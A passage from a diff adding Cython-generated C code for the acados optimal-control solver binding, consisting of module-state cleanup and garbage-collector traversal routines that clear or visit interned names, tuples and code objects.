Py_CLEAR(clear_module_state->__pyx_n_s_overwrite); + Py_CLEAR(clear_module_state->__pyx_n_u_p); + Py_CLEAR(clear_module_state->__pyx_n_s_pack); + Py_CLEAR(clear_module_state->__pyx_n_s_path); + Py_CLEAR(clear_module_state->__pyx_n_u_pi); + Py_CLEAR(clear_module_state->__pyx_n_u_pi_2); + Py_CLEAR(clear_module_state->__pyx_n_s_pickle); + Py_CLEAR(clear_module_state->__pyx_n_s_print); + Py_CLEAR(clear_module_state->__pyx_n_u_print_level); + Py_CLEAR(clear_module_state->__pyx_n_s_print_statistics); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_checksum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_result); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_type); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_unpickle_Enum); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_vtable); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_iter); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_mu0); + Py_CLEAR(clear_module_state->__pyx_n_s_qp_solver_cond_N); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tau_min); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tol_comp); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tol_eq); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tol_ineq); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_tol_stat); + Py_CLEAR(clear_module_state->__pyx_n_u_qp_warm_start); + Py_CLEAR(clear_module_state->__pyx_n_u_r); + Py_CLEAR(clear_module_state->__pyx_n_s_range); + Py_CLEAR(clear_module_state->__pyx_n_s_recompute); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_register); + Py_CLEAR(clear_module_state->__pyx_n_b_res_comp); + Py_CLEAR(clear_module_state->__pyx_n_b_res_eq); + Py_CLEAR(clear_module_state->__pyx_n_b_res_ineq); + Py_CLEAR(clear_module_state->__pyx_n_b_res_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_reset); + Py_CLEAR(clear_module_state->__pyx_n_u_residuals); + Py_CLEAR(clear_module_state->__pyx_n_u_rti_phase); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_n_s_set); + Py_CLEAR(clear_module_state->__pyx_n_s_set_new_time_steps); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_shape); + Py_CLEAR(clear_module_state->__pyx_n_s_size); + Py_CLEAR(clear_module_state->__pyx_n_u_sl); + Py_CLEAR(clear_module_state->__pyx_n_u_sl_2); + Py_CLEAR(clear_module_state->__pyx_n_s_solution); + Py_CLEAR(clear_module_state->__pyx_n_s_solve); + Py_CLEAR(clear_module_state->__pyx_kp_u_solver_option_must_be_of_type_fl); + Py_CLEAR(clear_module_state->__pyx_kp_u_solver_option_must_be_of_type_in); + Py_CLEAR(clear_module_state->__pyx_kp_u_solver_option_must_be_of_type_st); + Py_CLEAR(clear_module_state->__pyx_n_s_sort_keys); + Py_CLEAR(clear_module_state->__pyx_n_s_spec); + Py_CLEAR(clear_module_state->__pyx_n_s_split); + Py_CLEAR(clear_module_state->__pyx_n_s_sqp_iter); + Py_CLEAR(clear_module_state->__pyx_n_u_sqp_iter); + Py_CLEAR(clear_module_state->__pyx_n_s_stage); + Py_CLEAR(clear_module_state->__pyx_n_s_start); + Py_CLEAR(clear_module_state->__pyx_n_s_stat_m); + Py_CLEAR(clear_module_state->__pyx_n_u_stat_m); + Py_CLEAR(clear_module_state->__pyx_n_s_stat_n); + Py_CLEAR(clear_module_state->__pyx_n_u_stat_n); + Py_CLEAR(clear_module_state->__pyx_n_u_statistics); + Py_CLEAR(clear_module_state->__pyx_n_s_step); + Py_CLEAR(clear_module_state->__pyx_n_u_step_length); + Py_CLEAR(clear_module_state->__pyx_n_s_stop); + Py_CLEAR(clear_module_state->__pyx_n_s_store_iterate); + Py_CLEAR(clear_module_state->__pyx_n_s_store_iterate_locals_lambda); + Py_CLEAR(clear_module_state->__pyx_kp_u_stored_current_iterate_in); + Py_CLEAR(clear_module_state->__pyx_n_s_strftime); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_direct); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_direct_or_indirect); + Py_CLEAR(clear_module_state->__pyx_kp_s_strided_and_indirect); + Py_CLEAR(clear_module_state->__pyx_n_s_string_fields); + Py_CLEAR(clear_module_state->__pyx_n_s_string_value); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_struct); + Py_CLEAR(clear_module_state->__pyx_n_u_su); + Py_CLEAR(clear_module_state->__pyx_n_u_su_2); + Py_CLEAR(clear_module_state->__pyx_n_s_sys); + Py_CLEAR(clear_module_state->__pyx_n_u_t); + Py_CLEAR(clear_module_state->__pyx_n_u_t_2); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_kp_s_third_party_acados_acados_templa); + Py_CLEAR(clear_module_state->__pyx_n_u_time_glob); + Py_CLEAR(clear_module_state->__pyx_n_u_time_lin); + Py_CLEAR(clear_module_state->__pyx_n_u_time_qp); + Py_CLEAR(clear_module_state->__pyx_n_u_time_qp_solver_call); + Py_CLEAR(clear_module_state->__pyx_n_u_time_qp_xcond); + Py_CLEAR(clear_module_state->__pyx_n_u_time_reg); + Py_CLEAR(clear_module_state->__pyx_n_u_time_sim); + Py_CLEAR(clear_module_state->__pyx_n_u_time_sim_ad); + Py_CLEAR(clear_module_state->__pyx_n_u_time_sim_la); + Py_CLEAR(clear_module_state->__pyx_n_u_time_solution_sensitivities); + Py_CLEAR(clear_module_state->__pyx_n_u_time_tot); + Py_CLEAR(clear_module_state->__pyx_n_u_tol_comp); + Py_CLEAR(clear_module_state->__pyx_n_u_tol_eq); + Py_CLEAR(clear_module_state->__pyx_n_u_tol_ineq); + Py_CLEAR(clear_module_state->__pyx_n_u_tol_stat); + Py_CLEAR(clear_module_state->__pyx_n_s_tolist); + Py_CLEAR(clear_module_state->__pyx_n_u_u); + Py_CLEAR(clear_module_state->__pyx_n_u_u_2); + Py_CLEAR(clear_module_state->__pyx_n_u_ubu); + Py_CLEAR(clear_module_state->__pyx_n_u_ubx); + Py_CLEAR(clear_module_state->__pyx_kp_s_unable_to_allocate_array_data); + Py_CLEAR(clear_module_state->__pyx_kp_s_unable_to_allocate_shape_and_str); + Py_CLEAR(clear_module_state->__pyx_n_s_unpack); + Py_CLEAR(clear_module_state->__pyx_n_s_update); + Py_CLEAR(clear_module_state->__pyx_n_s_update_qp_solver_cond_N); + Py_CLEAR(clear_module_state->__pyx_n_s_utcnow); + Py_CLEAR(clear_module_state->__pyx_kp_u_utf_8); + Py_CLEAR(clear_module_state->__pyx_n_s_value); + Py_CLEAR(clear_module_state->__pyx_n_s_value_2); + Py_CLEAR(clear_module_state->__pyx_n_s_value_shape); + Py_CLEAR(clear_module_state->__pyx_n_s_version_info); + Py_CLEAR(clear_module_state->__pyx_n_u_w); + Py_CLEAR(clear_module_state->__pyx_n_u_warm_start_first_qp); + Py_CLEAR(clear_module_state->__pyx_kp_u_with_dimension); + Py_CLEAR(clear_module_state->__pyx_kp_u_with_dimension_you_have); + Py_CLEAR(clear_module_state->__pyx_n_b_x); + Py_CLEAR(clear_module_state->__pyx_n_s_x); + Py_CLEAR(clear_module_state->__pyx_n_u_x); + Py_CLEAR(clear_module_state->__pyx_n_u_x_2); + Py_CLEAR(clear_module_state->__pyx_n_u_xdot_guess); + Py_CLEAR(clear_module_state->__pyx_n_u_y_ref); + Py_CLEAR(clear_module_state->__pyx_kp_u_you_have); + Py_CLEAR(clear_module_state->__pyx_n_u_yref); + Py_CLEAR(clear_module_state->__pyx_n_u_z); + Py_CLEAR(clear_module_state->__pyx_n_u_z_2); + Py_CLEAR(clear_module_state->__pyx_n_u_z_guess); + Py_CLEAR(clear_module_state->__pyx_n_s_zeros); + Py_CLEAR(clear_module_state->__pyx_int_0); + Py_CLEAR(clear_module_state->__pyx_int_1); + Py_CLEAR(clear_module_state->__pyx_int_2); + Py_CLEAR(clear_module_state->__pyx_int_3); + Py_CLEAR(clear_module_state->__pyx_int_4); + Py_CLEAR(clear_module_state->__pyx_int_6); + Py_CLEAR(clear_module_state->__pyx_int_7); + Py_CLEAR(clear_module_state->__pyx_int_112105877); + Py_CLEAR(clear_module_state->__pyx_int_136983863); + Py_CLEAR(clear_module_state->__pyx_int_184977713); + Py_CLEAR(clear_module_state->__pyx_int_neg_1); + Py_CLEAR(clear_module_state->__pyx_int_neg_5); + Py_CLEAR(clear_module_state->__pyx_slice__5); + Py_CLEAR(clear_module_state->__pyx_tuple__4); + Py_CLEAR(clear_module_state->__pyx_tuple__8); + Py_CLEAR(clear_module_state->__pyx_tuple__9); + Py_CLEAR(clear_module_state->__pyx_slice__16); + Py_CLEAR(clear_module_state->__pyx_tuple__10); + Py_CLEAR(clear_module_state->__pyx_tuple__11); + Py_CLEAR(clear_module_state->__pyx_tuple__12); + Py_CLEAR(clear_module_state->__pyx_tuple__13); + Py_CLEAR(clear_module_state->__pyx_tuple__17); + Py_CLEAR(clear_module_state->__pyx_tuple__18); + Py_CLEAR(clear_module_state->__pyx_tuple__19); + Py_CLEAR(clear_module_state->__pyx_tuple__20); + Py_CLEAR(clear_module_state->__pyx_tuple__21); + Py_CLEAR(clear_module_state->__pyx_tuple__22); + Py_CLEAR(clear_module_state->__pyx_tuple__23); + Py_CLEAR(clear_module_state->__pyx_tuple__24); + Py_CLEAR(clear_module_state->__pyx_tuple__25); + Py_CLEAR(clear_module_state->__pyx_tuple__26); + Py_CLEAR(clear_module_state->__pyx_tuple__27); + Py_CLEAR(clear_module_state->__pyx_tuple__28); + Py_CLEAR(clear_module_state->__pyx_tuple__30); + Py_CLEAR(clear_module_state->__pyx_tuple__31); + Py_CLEAR(clear_module_state->__pyx_tuple__32); + Py_CLEAR(clear_module_state->__pyx_tuple__33); + Py_CLEAR(clear_module_state->__pyx_tuple__34); + Py_CLEAR(clear_module_state->__pyx_tuple__35); + Py_CLEAR(clear_module_state->__pyx_tuple__36); + Py_CLEAR(clear_module_state->__pyx_tuple__37); + Py_CLEAR(clear_module_state->__pyx_tuple__38); + Py_CLEAR(clear_module_state->__pyx_tuple__39); + Py_CLEAR(clear_module_state->__pyx_tuple__41); + Py_CLEAR(clear_module_state->__pyx_tuple__45); + Py_CLEAR(clear_module_state->__pyx_tuple__47); + Py_CLEAR(clear_module_state->__pyx_tuple__49); + Py_CLEAR(clear_module_state->__pyx_tuple__51); + Py_CLEAR(clear_module_state->__pyx_tuple__52); + Py_CLEAR(clear_module_state->__pyx_tuple__55); + Py_CLEAR(clear_module_state->__pyx_tuple__57); + Py_CLEAR(clear_module_state->__pyx_tuple__58); + Py_CLEAR(clear_module_state->__pyx_tuple__60); + Py_CLEAR(clear_module_state->__pyx_tuple__62); + Py_CLEAR(clear_module_state->__pyx_tuple__65); + Py_CLEAR(clear_module_state->__pyx_tuple__67); + Py_CLEAR(clear_module_state->__pyx_tuple__69); + Py_CLEAR(clear_module_state->__pyx_tuple__71); + Py_CLEAR(clear_module_state->__pyx_tuple__72); + Py_CLEAR(clear_module_state->__pyx_tuple__74); + Py_CLEAR(clear_module_state->__pyx_tuple__77); + Py_CLEAR(clear_module_state->__pyx_tuple__79); + Py_CLEAR(clear_module_state->__pyx_tuple__82); + Py_CLEAR(clear_module_state->__pyx_codeobj__40); + Py_CLEAR(clear_module_state->__pyx_codeobj__42); + Py_CLEAR(clear_module_state->__pyx_codeobj__43); + Py_CLEAR(clear_module_state->__pyx_codeobj__44); + Py_CLEAR(clear_module_state->__pyx_codeobj__46); + Py_CLEAR(clear_module_state->__pyx_codeobj__48); + Py_CLEAR(clear_module_state->__pyx_codeobj__50); + Py_CLEAR(clear_module_state->__pyx_codeobj__53); + Py_CLEAR(clear_module_state->__pyx_codeobj__54); + Py_CLEAR(clear_module_state->__pyx_codeobj__56); + Py_CLEAR(clear_module_state->__pyx_codeobj__59); + Py_CLEAR(clear_module_state->__pyx_codeobj__61); + Py_CLEAR(clear_module_state->__pyx_codeobj__63); + Py_CLEAR(clear_module_state->__pyx_codeobj__64); + Py_CLEAR(clear_module_state->__pyx_codeobj__66); + Py_CLEAR(clear_module_state->__pyx_codeobj__68); + Py_CLEAR(clear_module_state->__pyx_codeobj__70); + Py_CLEAR(clear_module_state->__pyx_codeobj__73); + Py_CLEAR(clear_module_state->__pyx_codeobj__75); + Py_CLEAR(clear_module_state->__pyx_codeobj__76); + Py_CLEAR(clear_module_state->__pyx_codeobj__78); + Py_CLEAR(clear_module_state->__pyx_codeobj__80); + Py_CLEAR(clear_module_state->__pyx_codeobj__81); + Py_CLEAR(clear_module_state->__pyx_codeobj__83); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_7cpython_4type_type); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_dtype); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flatiter); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_broadcast); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ndarray); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_generic); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_number); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_integer); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_signedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_inexact); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_floating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_complexfloating); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_flexible); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_character); + Py_VISIT(traverse_module_state->__pyx_ptype_5numpy_ufunc); + Py_VISIT(traverse_module_state->__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + Py_VISIT(traverse_module_state->__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + Py_VISIT(traverse_module_state->__pyx_array_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_array); + Py_VISIT(traverse_module_state->__pyx_MemviewEnum_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_MemviewEnum); + Py_VISIT(traverse_module_state->__pyx_memoryview_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_memoryview); + Py_VISIT(traverse_module_state->__pyx_memoryviewslice_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_memoryviewslice); + Py_VISIT(traverse_module_state->__pyx_kp_u_); + Py_VISIT(traverse_module_state->__pyx_n_s_ASCII); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___get_poin); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___get_stat_3); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___reduce_c); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython___setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython__get_poin); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython__get_stat_3); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_constraint); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_constraint_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_cost_set); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_cost_set_m); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_does_not_s); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_dynamics_g); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_eval_param); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_eval_param_3); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_get); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_get_cost); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_field); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_is_an); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_get_residu); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_get_stage); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_get_stats); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_load_itera); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_options_se); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_options_se_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_print_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_reset); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_set); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_set_is_not); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_set_mismat); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_set_new_ti); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_solve); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_solve_argu); + Py_VISIT(traverse_module_state->__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_store_iter); + Py_VISIT(traverse_module_state->__pyx_n_s_AcadosOcpSolverCython_update_qp); + Py_VISIT(traverse_module_state->__pyx_kp_s_All_dimensions_preceding_dimensi); + Py_VISIT(traverse_module_state->__pyx_n_s_AssertionError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Buffer_view_does_not_expose_stri); + Py_VISIT(traverse_module_state->__pyx_kp_s_Can_only_create_a_buffer_that_is); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_assign_to_read_only_memor); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_create_writable_memory_vi); + Py_VISIT(traverse_module_state->__pyx_kp_u_Cannot_index_with_type); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_transpose_memoryview_with); + Py_VISIT(traverse_module_state->__pyx_kp_s_Dimension_d_is_not_direct); + Py_VISIT(traverse_module_state->__pyx_n_s_Ellipsis); + Py_VISIT(traverse_module_state->__pyx_kp_s_Empty_shape_tuple_for_cython_arr); + Py_VISIT(traverse_module_state->__pyx_n_u_F); + Py_VISIT(traverse_module_state->__pyx_n_s_ImportError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_VISIT(traverse_module_state->__pyx_n_s_IndexError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Index_out_of_bounds_axis_d); + Py_VISIT(traverse_module_state->__pyx_kp_s_Indirect_dimensions_not_supporte); + Py_VISIT(traverse_module_state->__pyx_kp_u_Invalid_mode_expected_c_or_fortr); + Py_VISIT(traverse_module_state->__pyx_kp_u_Invalid_shape_in_axis); + Py_VISIT(traverse_module_state->__pyx_n_s_MemoryError); + Py_VISIT(traverse_module_state->__pyx_kp_s_MemoryView_of_r_at_0x_x); + Py_VISIT(traverse_module_state->__pyx_kp_s_MemoryView_of_r_object); + Py_VISIT(traverse_module_state->__pyx_n_s_N); + Py_VISIT(traverse_module_state->__pyx_kp_u_None); + Py_VISIT(traverse_module_state->__pyx_n_s_NotImplementedError); + Py_VISIT(traverse_module_state->__pyx_n_b_O); + Py_VISIT(traverse_module_state->__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + Py_VISIT(traverse_module_state->__pyx_n_s_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_u_SQP); + Py_VISIT(traverse_module_state->__pyx_n_u_SQP_RTI); + Py_VISIT(traverse_module_state->__pyx_n_s_Sequence); + Py_VISIT(traverse_module_state->__pyx_kp_s_Step_may_not_be_zero_axis_d); + Py_VISIT(traverse_module_state->__pyx_kp_u_TODO); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Unable_to_convert_item_to_object); + Py_VISIT(traverse_module_state->__pyx_n_s_ValueError); + Py_VISIT(traverse_module_state->__pyx_n_s_View_MemoryView); + Py_VISIT(traverse_module_state->__pyx_kp_u_Y_m_d_H_M_S_f); + Py_VISIT(traverse_module_state->__pyx_kp_u__14); + Py_VISIT(traverse_module_state->__pyx_n_u__15); + Py_VISIT(traverse_module_state->__pyx_kp_u__2); + Py_VISIT(traverse_module_state->__pyx_kp_u__29); + Py_VISIT(traverse_module_state->__pyx_n_s__3); + Py_VISIT(traverse_module_state->__pyx_kp_u__6); + Py_VISIT(traverse_module_state->__pyx_kp_u__7); + Py_VISIT(traverse_module_state->__pyx_n_s__84); + Py_VISIT(traverse_module_state->__pyx_n_s_abc); + Py_VISIT(traverse_module_state->__pyx_n_s_acados_template_acados_ocp_solve); + Py_VISIT(traverse_module_state->__pyx_n_s_allocate_buffer); + Py_VISIT(traverse_module_state->__pyx_n_u_alpha); + Py_VISIT(traverse_module_state->__pyx_n_u_alpha_min); + Py_VISIT(traverse_module_state->__pyx_n_u_alpha_reduction); + Py_VISIT(traverse_module_state->__pyx_kp_u_alpha_values_are_not_available_f); + Py_VISIT(traverse_module_state->__pyx_kp_u_and); + Py_VISIT(traverse_module_state->__pyx_n_s_array); + Py_VISIT(traverse_module_state->__pyx_n_s_ascontiguousarray); + Py_VISIT(traverse_module_state->__pyx_n_s_asfortranarray); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_kp_u_at_stage); + Py_VISIT(traverse_module_state->__pyx_n_s_base); + Py_VISIT(traverse_module_state->__pyx_n_s_c); + Py_VISIT(traverse_module_state->__pyx_n_u_c); + Py_VISIT(traverse_module_state->__pyx_n_s_class); + Py_VISIT(traverse_module_state->__pyx_n_s_class_getitem); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_collections); + Py_VISIT(traverse_module_state->__pyx_kp_s_collections_abc); + Py_VISIT(traverse_module_state->__pyx_n_s_constraints_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_constraints_set); + Py_VISIT(traverse_module_state->__pyx_kp_s_contiguous_and_direct); + Py_VISIT(traverse_module_state->__pyx_kp_s_contiguous_and_indirect); + Py_VISIT(traverse_module_state->__pyx_n_s_cost_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_cost_set); + Py_VISIT(traverse_module_state->__pyx_n_s_count); + Py_VISIT(traverse_module_state->__pyx_n_s_datetime); + Py_VISIT(traverse_module_state->__pyx_n_s_default); + Py_VISIT(traverse_module_state->__pyx_n_s_dict); + Py_VISIT(traverse_module_state->__pyx_n_s_dims); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_n_s_double_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_double_value); + Py_VISIT(traverse_module_state->__pyx_n_s_dtype); + Py_VISIT(traverse_module_state->__pyx_n_s_dtype_is_object); + Py_VISIT(traverse_module_state->__pyx_n_s_dump); + Py_VISIT(traverse_module_state->__pyx_n_s_dynamics_get); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_encode); + Py_VISIT(traverse_module_state->__pyx_n_s_enter); + Py_VISIT(traverse_module_state->__pyx_n_s_enumerate); + Py_VISIT(traverse_module_state->__pyx_n_u_eps_sufficient_descent); + Py_VISIT(traverse_module_state->__pyx_n_s_error); + Py_VISIT(traverse_module_state->__pyx_n_s_eval_param_sens); + Py_VISIT(traverse_module_state->__pyx_n_u_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_exit); + Py_VISIT(traverse_module_state->__pyx_n_s_f); + Py_VISIT(traverse_module_state->__pyx_n_s_field); + Py_VISIT(traverse_module_state->__pyx_n_s_field_2); + Py_VISIT(traverse_module_state->__pyx_n_s_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_filename); + Py_VISIT(traverse_module_state->__pyx_n_s_flags); + Py_VISIT(traverse_module_state->__pyx_n_s_float64); + Py_VISIT(traverse_module_state->__pyx_kp_u_for_field); + Py_VISIT(traverse_module_state->__pyx_n_s_format); + Py_VISIT(traverse_module_state->__pyx_n_s_fortran); + Py_VISIT(traverse_module_state->__pyx_n_u_fortran); + Py_VISIT(traverse_module_state->__pyx_n_s_full_stats); + Py_VISIT(traverse_module_state->__pyx_n_u_full_step_dual); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_get); + Py_VISIT(traverse_module_state->__pyx_n_s_get_cost); + Py_VISIT(traverse_module_state->__pyx_n_s_get_pointers_solver); + Py_VISIT(traverse_module_state->__pyx_n_s_get_residuals); + Py_VISIT(traverse_module_state->__pyx_n_s_get_stat_double); + Py_VISIT(traverse_module_state->__pyx_n_s_get_stat_int); + Py_VISIT(traverse_module_state->__pyx_n_s_get_stat_matrix); + Py_VISIT(traverse_module_state->__pyx_n_s_get_stats); + Py_VISIT(traverse_module_state->__pyx_n_s_getcwd); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_u_globalization); + Py_VISIT(traverse_module_state->__pyx_n_u_globalization_use_SOC); + Py_VISIT(traverse_module_state->__pyx_kp_u_got); + Py_VISIT(traverse_module_state->__pyx_kp_u_got_differing_extents_in_dimensi); + Py_VISIT(traverse_module_state->__pyx_n_s_i); + Py_VISIT(traverse_module_state->__pyx_n_s_id); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_n_s_indent); + Py_VISIT(traverse_module_state->__pyx_n_s_index); + Py_VISIT(traverse_module_state->__pyx_n_u_initialize_t_slacks); + Py_VISIT(traverse_module_state->__pyx_n_s_initializing); + Py_VISIT(traverse_module_state->__pyx_n_s_int); + Py_VISIT(traverse_module_state->__pyx_n_s_int_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_int_value); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_isfile); + Py_VISIT(traverse_module_state->__pyx_n_s_itemsize); + Py_VISIT(traverse_module_state->__pyx_kp_s_itemsize_0_for_cython_array); + Py_VISIT(traverse_module_state->__pyx_n_u_iterate); + Py_VISIT(traverse_module_state->__pyx_n_s_join); + Py_VISIT(traverse_module_state->__pyx_n_s_json); + Py_VISIT(traverse_module_state->__pyx_kp_u_json_2); + Py_VISIT(traverse_module_state->__pyx_n_s_key); + Py_VISIT(traverse_module_state->__pyx_n_s_keys); + Py_VISIT(traverse_module_state->__pyx_n_u_lam); + Py_VISIT(traverse_module_state->__pyx_n_u_lam_2); + Py_VISIT(traverse_module_state->__pyx_n_u_lbu); + Py_VISIT(traverse_module_state->__pyx_n_u_lbx); + Py_VISIT(traverse_module_state->__pyx_n_u_line_search_use_sufficient_desce); + Py_VISIT(traverse_module_state->__pyx_n_s_load); + Py_VISIT(traverse_module_state->__pyx_n_s_load_iterate); + Py_VISIT(traverse_module_state->__pyx_kp_u_load_iterate_failed_file_does_no); + Py_VISIT(traverse_module_state->__pyx_n_s_m); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + 